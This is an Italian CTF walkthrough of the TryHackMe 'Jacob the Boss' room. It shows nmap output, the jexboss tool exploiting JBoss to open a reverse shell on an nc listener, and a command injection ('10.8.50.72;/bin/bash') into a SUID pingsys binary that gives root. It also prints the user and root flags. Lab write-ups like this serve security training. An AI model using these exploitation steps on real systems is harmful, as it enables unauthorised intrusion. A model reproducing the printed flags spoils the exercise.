Descrizione:
Well, the flaw that makes up this box is the reproduction found in the production environment of a customer a while ago, the verification in season consisted of two steps, the last one within the environment, we hit it head-on and more than 15 machines were vulnerable that together with the development team we were able to correct and adapt.
*First of all, add the jacobtheboss.box address to your hosts file.
Anyway, learn a little more, have fun!
Link: https://tryhackme.com/room/jacobtheboss
⠀
USER FLAG:
Proviamo a fare una scansione con Nmap, notiamo subito che il server non ha firewall ed è molto vulnerabile, dato interessante per inviare qualche exploit o cose simili:
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:ca:13:6e:d9:63:c0:5f:4a:23:a5:a5:a5:10:3c:7f (RSA)
| 256 a4:6e:d2:5d:0d:36:2e:73:2f:1d:52:9c:e5:8a:7b:04 (ECDSA)
|_ 256 6f:54:a6:5e:ba:5b:ad:cc:87:ee:d3:a8:d5:e0:aa:2a (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.20
|_http-title: My first blog
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
1090/tcp open java-rmi Java RMI
|_rmi-dumpregistry: ERROR: Script execution failed (use -d to debug)
1098/tcp open java-rmi Java RMI
1099/tcp open java-object Java Object Serialization
| fingerprint-strings:
| NULL:
| java.rmi.MarshalledObject|
| hash[
| locBytest
| objBytesq
| http://jacobtheboss.box:8083/q
| org.jnp.server.NamingServer_Stub
| java.rmi.server.RemoteStub
| java.rmi.server.RemoteObject
| xpw;
| UnicastRef2
|_ jacobtheboss.box
3306/tcp open mysql MariaDB (unauthorized)
4444/tcp open java-rmi Java RMI
4445/tcp open java-object Java Object Serialization
4446/tcp open java-object Java Object Serialization
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
| Potentially risky methods: PUT DELETE TRACE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss™
8083/tcp open http JBoss service httpd
|_http-title: Site doesn't have a title (text/html).
Possiamo notare che nella porta 80 è in esecuzione il server JBOSS con tanto di versione 5.0, facendo una rapida ricerca online notiamo che quella versione ha diverse vulnerabilità che si possono sfruttare, proviamo a scaricarlo.
parrot@parrot:/data/Jacob_the_Boss/files/jexboss$ python jexboss.py -u http://jacobtheboss.box:8080/
* --- JexBoss: Jboss verify and EXploitation Tool --- *
| * And others Java Deserialization Vulnerabilities * |
| |
| @author: João Filho Matos Figueiredo |
| @contact: joaomatosf@gmail.com |
| |
| @update: https://github.com/joaomatosf/jexboss |
#______________________________________________________#
@version: 1.2.4
* Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
** Checking Host: http://jacobtheboss.box:8080/ **
[*] Checking admin-console: [ OK ]
[*] Checking Struts2: [ OK ]
[*] Checking Servlet Deserialization: [ OK ]
[*] Checking Application Deserialization: [ OK ]
[*] Checking Jenkins: [ OK ]
[*] Checking web-console: [ VULNERABLE ]
[*] Checking jmx-console: [ VULNERABLE ]
[*] Checking JMXInvokerServlet: [ VULNERABLE ]
* Do you want to try to run an automated exploitation via "web-console" ?
If successful, this operation will provide a simple command shell to execute
commands on the server..
Continue only if you have permission!
yes/NO? yes
* Sending exploit code to http://jacobtheboss.box:8080/. Please wait...
Ora possiamo mettere una specie di sniffer alla porta 4444 per poi fornire al servizio l'IP privato e pubblico LHOST e LPORT.
parrot@user:/data/vpn$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.156.161] 43552
bash: no job control in this shell
[jacob@jacobtheboss /]$ id
id
uid=1001(jacob) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0
Per la flag basterà aprire il file .txt.
USER FLAG: f4d491f280de360cc49e26ca1587cbcc
⠀
ROOT FLAG:
Procediamo analizzando gli script dell'installazione di DotClear! L'accesso alla configurazione (root) è SENZA PASSWORD quindi non serve neanche fare un attacco brute force o analoghi, il problema avviene quando bisogna decifrare l'hash quindi tentiamo di enumerare ma con scarsi risultati.
Per fortuna c'è esiste un programma insolito di proprietà di root con il bit SUID impostato:
[jacob@jacobtheboss mail]$ find / -type f -user root -perm -u=s 2>/dev/null
find / -type f -user root -perm -u=s 2>/dev/null
/usr/bin/pingsys <------------- interesting!
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/chage
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
Il programma è vulnerabile e possiamo inserire dei comandi per avere la root shell:
[jacob@jacobtheboss mail]$ /usr/bin/pingsys "10.8.50.72;/bin/bash"
/usr/bin/pingsys "10.8.50.72;/bin/bash"
PING 10.8.50.72 (10.8.50.72) 56(84) bytes of data.
64 bytes from 10.8.50.72: icmp_seq=1 ttl=63 time=46.2 ms
64 bytes from 10.8.50.72: icmp_seq=2 ttl=63 time=61.8 ms
64 bytes from 10.8.50.72: icmp_seq=3 ttl=63 time=294 ms
64 bytes from 10.8.50.72: icmp_seq=4 ttl=63 time=271 ms
--- 10.8.50.72 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 46.259/168.534/294.567/114.923 ms
[root@jacobtheboss mail]# id
id
uid=0(root) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0
Come prima la flag si trova nel file root.txt:
ROOT FLAG: 29a5641eaa0c01abe5749608c8232806
Riassumendo:
Questa room è abbastanza incasinata quindi la consiglio a persone che hanno già esperienza o almeno di livello intermedio!😁